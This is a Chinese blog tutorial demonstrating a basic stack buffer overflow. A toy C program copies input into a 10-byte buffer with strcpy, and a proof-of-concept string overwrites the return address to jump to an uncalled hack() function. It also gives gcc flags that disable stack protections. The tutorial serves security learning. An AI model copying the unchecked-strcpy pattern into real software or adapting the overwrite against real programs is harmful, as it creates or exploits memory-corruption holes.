千家信息网

简单栈溢出利用

发表于:2025-01-19 作者:千家信息网编辑
千家信息网最后更新 2025年01月19日,#include#includevoid fun(char *name){ char buf[10]; strcpy(buf,name); printf("%s\n",buf);}v
千家信息网最后更新 2025年01月19日简单栈溢出利用
#include#includevoid fun(char *name){    char buf[10];    strcpy(buf,name);    printf("%s\n",buf);}void hack(){    printf("flag\n");}int main(){    char name[]="Alex@bbb";    fun(name);    return 0;}

上面的程序是一个正常的C语言程序,但是main函数中没有调用hack()函数,下面我就演示下如何利用缓冲区溢出来执行hack函数的内容。


使用codeblocks编译并执行上述程序后,拖入od查看栈的变化情况,看看给变量name赋什么值的时候,会恰好覆盖掉call fun处的函数返回地址




F7跟进 F8 一句一句执行:







因此我们添加poc:

#include#includevoid fun(char *name){    char buf[10];    strcpy(buf,name);    printf("%s\n",buf);}void hack(){    printf("flag\n");}int main(){    char name[]="Alex@bbbaaaaaaaaaaaaaa\x59\x13\x40\00"; //这里后边四个为hack()函数地址    fun(name);    return 0;}


重新编译执行后,我们发现利用成功:





在使用ubuntu复现栈溢出的时候需要关闭栈保护机制:

使用gcc编译时全部关闭保护机制,参数-fno-stack-protector用来关闭gcc编译器gs验证码机制,

-z execstack用来关闭ld链接器堆栈段不可执行机制。





这里有一个linux下64位的栈溢出过程。

https://www.secpulse.com/archives/32328.html






0